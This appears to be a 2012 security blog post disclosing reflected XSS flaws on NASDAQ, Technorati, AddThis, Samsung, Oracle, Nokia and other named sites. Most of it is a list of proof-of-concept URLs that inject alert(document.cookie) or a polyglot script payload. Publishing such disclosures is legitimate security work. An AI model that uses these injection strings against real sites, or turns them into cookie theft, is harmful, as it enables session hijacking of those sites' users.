Friday 8 June 2012

AddThis, TECHNORATI, Way2SMS and other sites vulnerable to XSS


Security researcher 'Ankit Sharma' has discovered cross-site scripting (XSS) vulnerabilities in a number of high-profile sites.

The NASDAQ, TECHNORATI, Conduit, AddThis and AIRODUMP websites were found to be vulnerable to XSS. He also found that Samsung, SourceForge and Oracle sites are vulnerable to this attack.

NASDAQ : http://stocksplits.nasdaq.com/UpcomingSplits.asp?pageName=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

TECHNORATI : http://technorati.com/search?return=posts&authority=high&q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

CONDUIT : http://search.conduit.com/?ctid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

ADDTHIS : http://www.addthis.com/services/all?a=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

AIRODUMP : http://download.airodump.net/datas/?dir=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

SAMSUNG : https://support-us.samsung.com/cyber/popup/pop_uploadmovie.jsp?symptom_movieid="><script>alert(document.cookie)</script>

SOURCEFORGE : http://marcion.sourceforge.net/dictionary/output.php?S=on&B=on&Sa=on&F=on&Sf=on&Fb=on&A=on&O=on&ssA=on&NH=on&und=on&exact=exact&word=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&search=search

ORACLE : http://tahiti.oracle.com/pls/db92/db92.show_toc?partno=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

NOKIA : http://beta.nokia.com/s40/nps/scripts/s40_nps.php?project_name=Ovi%20Browser&emailfield=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E